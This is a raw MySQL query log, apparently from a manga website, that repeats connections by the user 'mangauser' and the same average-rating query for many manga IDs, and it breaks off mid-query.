Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330652250 Quit 330652251 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330652251 Quit 330652252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330652252 Quit 330652253 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330652253 Quit 330652254 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330652254 Quit 330652255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330652255 Quit 330652256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330652256 Quit 330652257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330652257 Quit 330652258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330652258 Quit 330652259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330652259 Quit 330652260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330652260 Quit 330652261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330652261 Quit 330652262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330652262 Quit 330652263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330652263 Quit 330652264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330652264 Quit 330652265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330652265 Quit 330652266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330652266 Quit 330652267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330652267 Quit 330652268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330652268 Quit 330652269 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330652269 Quit 330652270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330652270 Quit 330652271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330652271 Quit 330652272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330652272 Quit 330652273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330652273 Quit 330652274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330652274 Quit 330652275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330652275 Quit 330652276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330652276 Quit 330652277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330652277 Quit 330652278 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330652278 Quit 330652279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330652279 Quit 330652280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330652280 Quit 330652281 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330652281 Quit 330652282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330652282 Quit 330652283 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330652283 Quit 330652284 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330652284 Quit 330652285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330652285 Quit 330652286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330652286 Quit 330652287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330652287 Quit 330652288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330652288 Quit 330652289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330652289 Quit 330652290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330652290 Quit 330652291 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330652291 Quit 330652292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330652292 Quit 330652293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330652293 Quit 330652294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330652294 Quit 330652295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330652295 Quit 330652296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330652296 Quit 330652297 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330652297 Quit 330652298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330652298 Quit 330652299 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652299 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330652299 Quit 330652300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330652300 Quit 330652301 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330652301 Quit 330652302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330652302 Quit 330652303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652303 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330652303 Quit 330652304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330652304 Quit 330652305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330652305 Quit 330652306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330652306 Quit 330652307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330652307 Quit 330652308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330652308 Quit 330652309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330652309 Quit 330652310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330652310 Quit 330652311 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330652311 Quit 330652312 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330652312 Quit 330652313 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330652313 Quit 330652314 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330652314 Quit 330652315 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330652315 Quit 330652316 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652316 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330652316 Quit 330652317 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330652317 Quit 330652318 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652318 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330652318 Quit 330652319 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330652319 Quit 330652320 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652320 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330652320 Quit 330652321 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330652321 Quit 330652322 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652322 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330652322 Quit 330652323 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330652323 Quit 330652324 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652324 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330652324 Quit 330652325 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330652325 Quit 330652326 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652326 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330652326 Quit 330652327 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330652327 Quit 330652328 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652328 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330652328 Quit 330652329 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330652329 Quit 330652330 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652330 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330652330 Quit 330652331 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652331 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330652331 Quit 330652332 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652332 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330652332 Quit 330652333 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652333 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330652333 Quit 330652334 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652334 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330652334 Quit 330652335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330652335 Quit 330652336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652336 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330652336 Quit 330652337 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652337 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330652337 Quit 330652338 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652338 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330652338 Quit 330652339 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652339 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330652339 Quit 330652340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652340 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330652340 Quit 330652341 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652341 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330652341 Quit 330652342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652342 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330652342 Quit 330652343 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330652343 Quit 330652344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330652344 Quit 330652345 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652345 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330652345 Quit 330652346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330652346 Quit 330652347 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652347 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330652347 Quit 330652348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330652348 Quit 330652349 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652349 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330652349 Quit 330652350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330652350 Quit 330652351 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652351 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330652351 Quit 330652352 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330652352 Quit 330652353 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330652353 Quit 330652354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330652354 Quit 330652355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330652355 Quit 330652356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330652356 Quit 330652357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330652357 Quit 330652358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330652358 Quit 330652359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652359 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330652359 Quit 330652360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330652360 Quit 330652361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330652361 Quit 330652362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330652362 Quit 330652363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330652363 Quit 330652364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330652364 Quit 330652365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330652365 Quit 330652366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330652366 Quit 330652367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330652367 Quit 330652368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330652368 Quit 330652369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330652369 Quit 330652370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330652370 Quit 330652371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330652371 Quit 330652372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330652372 Quit 330652373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330652373 Quit 330652374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330652374 Quit 330652375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330652375 Quit 330652376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330652376 Quit 330652377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330652377 Quit 330652378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330652378 Quit 330652379 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330652379 Quit 330652380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330652380 Quit 330652381 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330652381 Quit 330652382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330652382 Quit 330652383 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330652383 Quit 330652384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330652384 Quit 330652385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330652385 Quit 330652386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330652386 Quit 330652387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330652387 Quit 330652388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330652388 Quit 330652389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330652389 Quit 330652390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330652390 Quit 330652391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330652391 Quit 330652392 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330652392 Quit 330652393 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330652393 Quit 330652394 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330652394 Quit 330652395 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330652395 Quit 330652396 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330652396 Quit 330652397 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330652397 Quit 330652398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330652398 Quit 330652399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330652399 Quit 330652400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330652400 Quit 330652401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330652401 Quit 330652402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330652402 Quit 330652403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652403 Query select 